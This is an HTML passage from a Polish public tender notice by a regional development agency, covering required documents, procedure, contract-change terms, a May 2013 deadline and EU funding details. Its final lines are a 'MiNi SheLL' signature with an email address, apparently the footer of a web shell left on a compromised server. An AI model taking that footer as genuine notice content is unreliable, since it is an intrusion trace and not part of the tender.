<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku ofert składanych przez Wykonawców występujących wspólnie - pełnomocnictwo dla reprezentanta z określeniem zakresu pełnomocnictwa oraz oświadczenia każdego ze wspólników, że spełniają warunki udziału w postępowaniu określone w art. 22 ust.1 p. 1-4 i nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo Zamówień Publicznych - jeżeli taka sytuacja występuje.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)zmiany terminów realizacji umowy z przyczyn leżących po stronie Zamawiającego. b)zmiany terminów realizacji umowy w przypadku opóźnień i przerw w realizacji zamówienia wynikających z przyczyn, których zaistnienia nie można przypisać Wykonawcy. c)zmiany w zapisach umowy spowodowane koniecznością dostosowania dokumentacji do zmieniających się wymogów PO KL, do interpretacji i wytycznych Instytucji Wdrażającej (IP II stopnia) oraz do obowiązujących przepisów prawa, d)w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, e)konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy zamawiającym a inną niż Wykonawca Stroną, f)nastąpi konieczność zmiany terminów określonych w umowie i jej załącznikach, spowodowana obiektywnymi czynnikami uniemożliwiającymi ich dotrzymanie oraz wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, g)nastąpi konieczność wprowadzenia zmian sposobu i zakresu realizacji zamówienia w przypadku, gdy konieczność wprowadzenia tej zmiany była spowodowana obiektywnymi czynnikami uniemożliwiającymi realizację umowy zgodnie z pierwotną wersją, h)w przypadku zmiany stawki podatku VAT, wynagrodzenie brutto Wykonawcy pozostanie na dotychczasowym poziomie, zaś zmianie ulegnie jedynie proporcja pomiędzy wartością netto a wartością brutto umowy, i)wykonawca może dokonywać zmiany osób bezpośrednio realizujących zamówienia przedstawionych w ofercie pod warunkiem, że uzyska pisemną zgodę Zamawiającego akceptującego nową osobę. Zamawiający może również zażądać od Wykonawcy zmiany osoby przedstawionej w ofercie Wykonawcy, jeżeli uzna, że osoba nie wykonuje swoich obowiązków wynikających z umowy przy czym w przypadku zmiany tej osoby nowa osoba wskazana na jego miejsce musi posiadać wykształcenie oraz doświadczenie równoważne lub wyższe od wykształcenia i doświadczenia osoby wymienianej. j)Zmiana osób uprawnionych do dokonywania czynności prawnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.darr.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląska Agencja Rozwoju Regionalnego S.A., ul. Szczawieńska 2, 58-310 Szczawno- Zdrój (sekretariat II piętro)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2013 godzina 12:00, miejsce: Dolnośląska Agencja Rozwoju Regionalnego S.A., ul. Szczawieńska 2, 58-310 Szczawno- Zdrój (sekretariat II piętro)...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie realizowane w ramach Projektu pn. KOMPETENCJE MOJĄ SZANSA. OSOBY NIEPEŁNOSPRAWNE AKTYWNE NA RYNKU PRACY Program Operacyjny Kapitał Ludzki - Priorytet VI. Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com